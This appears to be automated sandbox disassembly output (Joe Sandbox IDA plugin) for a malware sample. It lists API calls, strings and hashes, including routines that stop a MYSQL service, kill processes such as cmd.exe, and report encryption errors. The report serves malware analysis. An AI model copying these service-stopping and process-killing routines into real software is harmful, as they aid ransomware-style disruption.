                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00BA1A1D
                                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00BA1A32
                                                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00BA1A46
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00BA1A5B
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00BA1A75
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00BA1A80
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00BA1A9E
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00BA1AA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                        • String ID: MYSQL
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF27F
                                                                                                                                                                          • Part of subcall function 00BC0CFC: std::exception::_Copy_str.LIBCMT ref: 00BC0D15
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF294
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF2AD
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF2C2
                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00BDF2D4
                                                                                                                                                                          • Part of subcall function 00BDEF74: std::exception::exception.LIBCMT ref: 00BDEF8E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF2E2
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF2FB
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF310
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                        • String ID: bad function call
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00BF54C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00BF54D4
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00BF54F7
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00BF5503
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00BF5531
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00BF555B
                                                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00BF55F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00BA244F
                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA2469
                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BA24A1
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00BA24B0
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA24B7
                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00BA24C1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA24CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                        • String ID: cmd.exe
                                                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                                                        • Opcode ID: b0689dd95bf0f070927cf4c2d1711e006f13fe8b5d00e27ef00c2a74c11fd15c
                                                                                                                                                                        • Instruction ID: 2fee51e465a52a5aa8a25946172565f6704307948751eca5439f8dfcfd497352
                                                                                                                                                                        • Opcode Fuzzy Hash: b0689dd95bf0f070927cf4c2d1711e006f13fe8b5d00e27ef00c2a74c11fd15c
                                                                                                                                                                        • Instruction Fuzzy Hash: 210175395013157FEB206BA5AC8DFAF77ACEF49755F0000A1FE08E2141EB7499848AB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                        • String ID:  $Error encrypting message: %s$\\n
                                                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                                                        • Opcode ID: 101eba236b91e45ec5c310c1a67a55ee9d947b1cc449e249efe44f473dab464a
                                                                                                                                                                        • Instruction ID: 607c1b9985689d4279c1b45aae92c7fdad1cf5f1a6be0f6ef700dad108aa2abb
                                                                                                                                                                        • Opcode Fuzzy Hash: 101eba236b91e45ec5c310c1a67a55ee9d947b1cc449e249efe44f473dab464a
                                                                                                                                                                        • Instruction Fuzzy Hash: 7CA153B1C00249DBEF11EFE4C846BEEBFB5AF15314F140478E40576292D7B65649CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strncmp
                                                                                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                                                                                        • API String ID: 909875538-2908105608
                                                                                                                                                                        • Opcode ID: 54c18a91abdadd4a7c6db9573608789c22d84eb41ee4c78bf919df2afadb4121
                                                                                                                                                                        • Instruction ID: 6200d33377725844d5fda074f14ce1014b9a22fbbfc5db450572befaf3599d7d
                                                                                                                                                                        • Opcode Fuzzy Hash: 54c18a91abdadd4a7c6db9573608789c22d84eb41ee4c78bf919df2afadb4121
                                                                                                                                                                        • Instruction Fuzzy Hash: 93412AA5B8835529FB32652DBC03FA667C58B50F11F0C48B1FB88EB2C2F791854E8195
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __init_pointers.LIBCMT ref: 00BB5141
                                                                                                                                                                          • Part of subcall function 00BB7D6C: EncodePointer.KERNEL32(00000000,?,00BB5146,00BB3FFE,00C97990,00000014), ref: 00BB7D6F
                                                                                                                                                                          • Part of subcall function 00BB7D6C: __initp_misc_winsig.LIBCMT ref: 00BB7D8A
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00BC26B3
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00BC26C7
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00BC26DA
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00BC26ED
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00BC2700
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00BC2713
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00BC2726
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00BC2739
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00BC274C
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00BC275F
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00BC2772
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00BC2785
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00BC2798
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00BC27AB
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00BC27BE
                                                                                                                                                                          • Part of subcall function 00BB7D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00BC27D1
                                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00BB5146
                                                                                                                                                                        • __mtterm.LIBCMT ref: 00BB514F
                                                                                                                                                                          • Part of subcall function 00BB51B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00BB5154,00BB3FFE,00C97990,00000014), ref: 00BB8B62
                                                                                                                                                                          • Part of subcall function 00BB51B7: _free.LIBCMT ref: 00BB8B69
                                                                                                                                                                          • Part of subcall function 00BB51B7: DeleteCriticalSection.KERNEL32(00C9AC00,?,?,00BB5154,00BB3FFE,00C97990,00000014), ref: 00BB8B8B
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00BB5174
                                                                                                                                                                        • __initptd.LIBCMT ref: 00BB5196
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BB519D
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3567560977-0
                                                                                                                                                                        • Opcode ID: d587970450754fa2ccb19b1ffee2645b2d7a41badc03ebc22af0d24e0cca9a34
                                                                                                                                                                        • Instruction ID: e7db26d6b91c73aa4ec8b7bcdf1d3132eccb0b12d980bfa91ab4ef222d73726a
                                                                                                                                                                        • Opcode Fuzzy Hash: d587970450754fa2ccb19b1ffee2645b2d7a41badc03ebc22af0d24e0cca9a34
                                                                                                                                                                        • Instruction Fuzzy Hash: 0BF09036159B511FE63977B8BC07BFE2AD4EF01730B2106EAF064E51D1EFE0944185A6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB594A
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __mtinitlocknum.LIBCMT ref: 00BB8B09
                                                                                                                                                                          • Part of subcall function 00BB8AF7: __amsg_exit.LIBCMT ref: 00BB8B15
                                                                                                                                                                          • Part of subcall function 00BB8AF7: EnterCriticalSection.KERNEL32(00000000,?,00BB50D7,0000000D), ref: 00BB8B22
                                                                                                                                                                        • _free.LIBCMT ref: 00BB5970
                                                                                                                                                                          • Part of subcall function 00BB0BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00BB507F,00000000,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0C01
                                                                                                                                                                          • Part of subcall function 00BB0BED: GetLastError.KERNEL32(00000000,?,00BB507F,00000000,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0C13
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5989
                                                                                                                                                                        • ___removelocaleref.LIBCMT ref: 00BB5998
                                                                                                                                                                        • ___freetlocinfo.LIBCMT ref: 00BB59B1
                                                                                                                                                                        • _free.LIBCMT ref: 00BB59C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 626533743-0
                                                                                                                                                                        • Opcode ID: 6c150211f6204f7c0fc0f53a2c031299ff146f784f227d157f728f6d387ab5ac
                                                                                                                                                                        • Instruction ID: 45d4009dfcc91457d41ad81ed266767d2fe3491bc03d72771fe5fe2afc3e7fd3
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c150211f6204f7c0fc0f53a2c031299ff146f784f227d157f728f6d387ab5ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 18015731502B00EBDE34AB68A846BFD72E4AF10731F2046DAE0A59A0D5CFF49981DA56
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00BE07C3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                                                                        • API String ID: 601868998-2416195885
                                                                                                                                                                        • Opcode ID: ca43da1518594e528d256e66c02f702340bf0a729c5a2729890b6e33c96806f3
                                                                                                                                                                        • Instruction ID: cb0d62b3a9f0f35387b5fdb6cd869697745f44e087101bfd881969e2d1a1ee9a
                                                                                                                                                                        • Opcode Fuzzy Hash: ca43da1518594e528d256e66c02f702340bf0a729c5a2729890b6e33c96806f3
                                                                                                                                                                        • Instruction Fuzzy Hash: AE41C471A043459BD720EE55CC45BAFB3D8EF95348F0008AEF585D3141E7B5ED098BA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00BD1726
                                                                                                                                                                        • _strlen.LIBCMT ref: 00BD1734
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        • _strnlen.LIBCMT ref: 00BD17BF
                                                                                                                                                                        • __lock.LIBCMT ref: 00BD17D0
                                                                                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00BD17DB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2168648987-0
                                                                                                                                                                        • Opcode ID: fc4668ddae5c6d1a372a61f7b6b76930fc56d3e69f60417da3e55d1a0e2df11d
                                                                                                                                                                        • Instruction ID: 96f21b28af747124c3454cde1262dd79e9543e5e195f5fd3320da5485e7d127b
                                                                                                                                                                        • Opcode Fuzzy Hash: fc4668ddae5c6d1a372a61f7b6b76930fc56d3e69f60417da3e55d1a0e2df11d
                                                                                                                                                                        • Instruction Fuzzy Hash: 11319A71655215BBDB216B6CDC41BEEB6D89F05B20F1409D6F814EB392FFB4CD0086A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 00BCB70B
                                                                                                                                                                          • Part of subcall function 00BB0C62: __FF_MSGBANNER.LIBCMT ref: 00BB0C79
                                                                                                                                                                          • Part of subcall function 00BB0C62: __NMSG_WRITE.LIBCMT ref: 00BB0C80
                                                                                                                                                                          • Part of subcall function 00BB0C62: RtlAllocateHeap.NTDLL(00E50000,00000000,00000001,00000001,?,?,?,00BC0E81,00000001,00000000,?,?,?,00BC0D1A,00BDF284,?), ref: 00BB0CA5
                                                                                                                                                                        • _free.LIBCMT ref: 00BCB71E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                                                        • Opcode ID: f51247a2c8edf308c852c0373dc226d12569051d9f8dc410f9e72db864f6fa60
                                                                                                                                                                        • Instruction ID: b17f683c7907748ec1883d9ef00c4bae99b5dd4fed2150e25f9aacdad41a164b
                                                                                                                                                                        • Opcode Fuzzy Hash: f51247a2c8edf308c852c0373dc226d12569051d9f8dc410f9e72db864f6fa60
                                                                                                                                                                        • Instruction Fuzzy Hash: 14119132505715AFCB312FB4AC86FBE3AD8EF85361F1045AAFC59A6151DF708C409691
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00BAF085
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAF0AC
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAF0B6
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAF0C4
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00BAF0D2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: fe2a593a4bd5e747066365b2ae262c78cba085728071784bb57315478cfb8323
                                                                                                                                                                        • Instruction ID: ed4abd93faa147ce185e07782f26213d2e2d0e4986e27c7fe4513cc18a2097b5
                                                                                                                                                                        • Opcode Fuzzy Hash: fe2a593a4bd5e747066365b2ae262c78cba085728071784bb57315478cfb8323
                                                                                                                                                                        • Instruction Fuzzy Hash: 730184356403096AEA309B54DC86FEE77A8E745B04F504051FA00AB1E3D7B5A545CBA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00BAE515
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAE53C
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAE546
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAE554
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00BAE562
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 48720bd9f44441faab8d6f632bf6e615ebe20a020ef8b2048ec5016b95ad5939
                                                                                                                                                                        • Instruction ID: 1b637ffbefb5684ff91a2a0cf8276ed58ee2161d04d566b0bd8a76cd77afc020
                                                                                                                                                                        • Opcode Fuzzy Hash: 48720bd9f44441faab8d6f632bf6e615ebe20a020ef8b2048ec5016b95ad5939
                                                                                                                                                                        • Instruction Fuzzy Hash: 4301DB35B803497AEB209B54EC87FAE7BACE745B08F144051FA00BB1E2D6F9A545C7B4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00BAFA53
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFA71
                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00BAFA7B
                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BAFA89
                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00BAFA94
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1380987712-0
                                                                                                                                                                        • Opcode ID: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction ID: 202497c6d3a827972449d65d04f7797bd25dfcb68585105b00cfd013fc463e45
                                                                                                                                                                        • Opcode Fuzzy Hash: 532fd262fd5af032d09f51c6669e7221e37bb2aeeb1784e06d8804849ea8be3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 62018631B40309BBEB209B94DC8AFFA3BACEB45B41F544061FA04FE1D1D7F5A84586A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                                                                                        • Opcode ID: c4b65205991d7faadfd89a6c019ee689e347eeb3904b86b288da2a91fb970852
                                                                                                                                                                        • Instruction ID: da8481e7a29a016beaf71f72868cdc7fae135cb03aa52e872deb200fc00853b5
                                                                                                                                                                        • Opcode Fuzzy Hash: c4b65205991d7faadfd89a6c019ee689e347eeb3904b86b288da2a91fb970852
                                                                                                                                                                        • Instruction Fuzzy Hash: FE818EB1A087919FD710CF2A9840A2BBBE5FFD8744F150A9DF98997351D730ED018B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmp
